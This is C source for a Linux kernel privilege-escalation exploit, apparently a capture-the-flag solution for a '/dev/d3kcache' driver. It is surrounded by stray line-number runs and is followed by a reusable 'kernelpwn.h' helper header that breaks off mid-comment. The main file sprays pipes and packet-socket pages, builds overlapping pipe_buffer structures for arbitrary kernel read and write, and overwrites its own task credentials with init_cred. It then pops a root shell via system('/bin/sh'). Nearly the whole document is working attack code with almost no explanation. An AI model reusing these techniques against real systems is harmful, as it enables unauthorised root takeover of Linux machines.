49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PIPE_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

int self_4th_pipe_idx = -1;
int self_2nd_pipe_idx = -1;
int self_3rd_pipe_idx = -1;
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
char temp_zero_buf[0x1000] = {'\0'};

int pipe_list[PIPE_NUM][2];

int fd;
struct argg {
int index;
int size;
char* data;
};

int add(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x114, &arg);
}

int dele(int index){
struct argg arg = {.index = index};
return ioctl(fd, 0x810, &arg);
}

int kwrite(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x514, &arg);
}

int kread(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x1919, &arg);
}

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_list[self_2nd_pipe_idx][1], src, len);
}

int main(int argc , char **argv, char **envp){
char buf[0x1000]= {'\0'};
save_status();
bind_core(0);
unshare_setup();

fd = open("/dev/d3kcache", O_RDWR);
if (fd < 0)
err_exit("open /dev/d3kcache");

prepare_pgv_system();
prepare_pgv_pages();

for(int i = 0; i < PIPE_NUM; i++){
if(pipe(pipe_list[i]) == -1){
err_exit("pipe");
}
}

for (int i = 0; i < PIPE_NUM/2; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++); // 8 * 4k
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

free_page(pgv_8pages_start_idx++); // 8 * 4k
for (int i = 0; i < 0x10; i++) { // 16 * 2k
add(i, 8, "11111111");
}

for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_list[i][1], "AAAAAAAA", 8); // tag
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], "AAAAAAAA", 8);
write(pipe_list[i][1], "BBBBBBBB", 8);
}

memset(buf, 0, sizeof(buf));
for (int i = 0; i < 0x10; i++) {
kwrite(i, 0x2048 - 8, buf);
}

int victim_idx = -1;
int orig_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){
char tag[0x10];
int nr;
memset(tag, 0, sizeof(tag));
read(pipe_list[i][0], tag, 8);
read(pipe_list[i][0], &nr, sizeof(int));
if (!strcmp(tag, "AAAAAAAA") && nr != i){
orig_idx = nr;
victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
}
}
if (orig_idx == -1 || victim_idx == -1){
err_exit("can't find");
}

struct pipe_buffer info_pipe_buf;
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf,'p',sizeof(buf));
write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
close(pipe_list[orig_idx][0]); /* 释放其中一个pipe_buffer */
close(pipe_list[orig_idx][1]);

//sleep(2);

puts("write down");

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx){
continue;
}
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
/* 2 * pipe_buffer = 0x60 kmalloc-96 */
err_exit("Fcntl Pipe");
}
}

memset(buf,0,sizeof(buf));
read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
print_hex(buf,SND_PIPE_BUF_SZ - 8);
read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
puts("change pipe_buffer down");

//sleep(2);

int snd_orig_idx = -1;
int snd_victim_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){ /* 第二次堆喷 */
int nr;
if (i == orig_idx || i == victim_idx){
continue;
}
read(pipe_list[i][0], &nr, sizeof(int));
if (i < PIPE_NUM && i != nr){
snd_orig_idx = nr;
snd_victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
}
}

if (snd_orig_idx == -1 || snd_victim_idx == -1){
err_exit("can't find");
}

size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf,'k',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
close(pipe_list[snd_orig_idx][0]);
close(pipe_list[snd_orig_idx][1]);

puts("write down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
/* 4 * pipe_buffer = 0xc0 kmalloc-192 */
err_exit("Fcntl Pipe");
}
}

puts("fcntl down");
//sleep(2);

evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_2nd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
self_2nd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'n',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_3rd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'m',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
//sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
//sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_4th_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_idx);
break;
}
}

memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;

//sleep(2);
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
puts("change pipe_buffer down");
//sleep(2);

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;

vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
printf("vmemmap_start: 0x%lx\n",vmemmap_base);
for (;;)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);
//printf("%lx\n",*(size_t*)buf);
if (*(uint64_t *)buf > 0xffffffff81000000 && ((*(uint64_t *)buf & 0xfff) == 0x070))
{
kernel_base = *(uint64_t *)buf - 0x070;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

uint64_t parent_task, current_task;
puts("[*] Seeking task_struct in memory...");

uint64_t *comm_addr = 0;
uint64_t *point_buf = malloc(0x1000);

char target[0x20];
strcpy(target, "8888888888");
if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0){
err_exit("cannot set name");
}

for (int i = 0; 1; i++)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

comm_addr = memmem(point_buf, 0xf00, target, strlen(target));
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-57] > 0xffff888000000000) /* task->read_parent */
&& (comm_addr[-56] > 0xffff888000000000)) /* task->parent */
{
parent_task = comm_addr[-57];

current_task = comm_addr[-50] - 2528;
page_offset_base = (comm_addr[-50] & 0xfffffffffffff000) - i * 0x1000;
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page *)(vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m0x%lx\n",
current_task);
printf("\033[34m\033[1m[*] parent task_struct's addr: \033[0m0x%lx\n\n",
parent_task);
break;
}
}

puts("[*] Seeking for init_task...");
uint64_t *tsk_buf;
/* 调试时通过解析task_struct->parent(offset=309*8)的方式向上一直找到init进程 */
uint64_t init_task = kernel_offset + 0xffffffff8301bb80;
uint64_t init_cred = kernel_offset + 0xffffffff83079ee8; // task->cred(offset=363*8)
uint64_t init_nsproxy = kernel_offset + 0xffffffff83079b40; // task->nsproxy (offset=377*8)
//sleep(5);

printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

puts("[*] Escalating ROOT privilege now...");

size_t current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
tsk_buf[363] = init_cred;
tsk_buf[364] = init_cred;
tsk_buf[377] = init_nsproxy;

arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40),&buf[512 * 8], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_root_shell();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

uint64_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
uint64_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *))
{
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
puts("[*] Checking for root...");

if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* for ret2usr attacker */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
void *(*prepare_kernel_cred_ptr)(void *) =
(void *(*)(void*)) prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void*)) commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

/**
* @brief create an isolate namespace
* note that the caller **SHOULD NOT** be used to get the root, but an operator
* to perform basic exploiting operations in it only
*/
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* not that we should create two process:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
{
perror("[-] socket (AF_PACKET)");
exit(1);
}

int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_VERSION)");
exit(1);
}

struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_RX_RING)");
exit(1);
}

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_halen = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
{
perror("[-] bind (AF_PACKET)");
exit(1);
}

return s;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

#define PIPE_SPRAY_NUM 200

#define PGV_1PAGE_SPRAY_NUM 0x20

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

void prepare_pgv_pages(void)
{
/**
* We want a more clear and continuous memory there, which require us to
